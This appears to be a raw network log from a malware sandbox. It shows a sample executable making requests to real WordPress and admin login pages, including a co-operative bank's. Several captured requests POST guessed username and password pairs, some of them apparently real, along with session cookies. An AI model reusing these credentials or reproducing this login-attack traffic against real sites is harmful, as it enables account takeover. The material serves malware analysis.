                                                                                                                                                                                                    2023-11-26 05:59:49 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 23 65 74 2d 61 6a 61 78 2d 73 61 76 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74
                                                                                                                                                                                                    Data Ascii: 1f40-webkit-box-sizing:border-box;box-sizing:border-box;direction:ltr}#et-ajax-saving{display:none;-webkit-transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,box-shadow .3s;transit
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC7822INData Raw: 79 3a 30 7d 68 65 61 64 65 72 2e 65 74 2d 6c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 42 6f 74 74 6f 6d 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30
                                                                                                                                                                                                    Data Ascii: y:0}header.et-l.et-l--header:after{clear:both;display:block;content:""}.et_pb_module{-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-duration:.2s;animation-duration:.2s}@-webkit-keyframes fadeBottom{0%{opacity:0
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    501192.168.2.452660213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC395OUTPOST /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/wp/wp-login.php
                                                                                                                                                                                                    Content-Length: 158
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC158OUTData Raw: 6c 6f 67 3d 63 72 6f 6d 61 6e 32 37 33 25 34 30 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 26 70 77 64 3d 68 6f 6c 61 61 61 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 25 32 46 77 70 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=croman273%40ceuandalucia.es&pwd=holaaaa&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fwww.ceuandalucia.es%2Fwp%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC7413INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    502192.168.2.45269634.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC175OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC7301INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 66 66 38 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53 74
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cookiff8es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, St


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    503192.168.2.45266634.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC581INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6238Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineSet-Cookie:
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC6238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    504192.168.2.45314354.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC168OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC294INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 70 61 67 65 73 2f 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:46 GMTServer: Apache/2.4.52 (Ubuntu)location: https://ce-logic.com/admin/pages/vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateContent-Length: 0Connection: closeCon


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    505192.168.2.452530164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC336OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gccb.co.in/wp-login.php
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC125OUTData Raw: 6c 6f 67 3d 69 6e 66 6f 26 70 77 64 3d 69 6e 66 6f 67 63 63 62 63 6f 69 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 63 63 62 2e 63 6f 2e 69 6e 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=info&pwd=infogccbcoin&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fgccb.co.in%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:48 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:47 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 05:59:48 UTC6704INData Raw: 31 61 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 1a28<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 05:59:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    506192.168.2.4526143.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC916OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: laravel_session=eyJpdiI6IjhxTUZQUlJiWjZFZnVkTkdlVzBJT1E9PSIsInZhbHVlIjoiK2pwQ2VQblNuTkxzcTE4aGRCVmQ1cTZHVVlVODhEL1hyaXBSMUx2azFoUmVkdXdYSFhEQzFnK1ZzTGdnR1Y5d1RrZU4rNlB1d2RlMDZ0a2RiNExSV25STnBUZEFoS1p4OGVacDdUckdxazdmL3hDOWtZaFJpUHJiSnRPQUlzbjciLCJtYWMiOiI4NjI2OGU4MDVhZmY1ZDg2Yjk0ZGY0NDhkMTQxNzAyMDZmNTNhNDUyYWZhYzVmZWQwYTVhYTU5M2RjMzVhNzdmIn0%3D; XSRF-TOKEN=eyJpdiI6IjFVQUlOU0JNOEkvUDBEKytURkN5V0E9PSIsInZhbHVlIjoiUllCNGk4WHF2aTloUjJpZHBmSzZHU0RZMWRHYmY1eEdWd1AxRFlVZTd5RVpjTXE4bE9PRktraFNYem9JbWtBRFVYc2tzME9QM3VRVXg0cWpScjFRak1JdUI1RGxwOG10YVJkMDI5UGY1UW9Ea0hGbUxkM01ycjBFMlYvSUhRRUciLCJtYWMiOiI1OWU0MDk3YTE4MGU1NTZiN2Y4YTkyOGNjY2VmMGNhMGRlNWQ3OTRjNzAzZjM2YWM0YThlZTA5NzgyMTBjM2ZkIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.knu.ac.in/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1099INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 32 64 33 46 61 54 31 46 45 52 6b 46 79 64 6d 77 79 4e 47 4a 34 53 6b 4e 79 62 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 6b 74 76 64 58 64 7a 4f 46 5a 30 59 31 4e 46 52 47 6b 76 51 55 39 42 4e 6d 70 4b 4e 57 74 58 4f 44 42 46 4d 47 52 69 57 55 6c 54 55 48 4a 77 53 55 31 6c 4e 56 70 71 64 31 46 58 55 53 74 71 5a 55 6f 30 63 30 63 76
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:47 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6Ikl2d3FaT1FERkFydmwyNGJ4SkNybmc9PSIsInZhbHVlIjoibktvdXdzOFZ0Y1NFRGkvQU9BNmpKNWtXODBFMGRiWUlTUHJwSU1lNVpqd1FXUStqZUo0c0cv


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
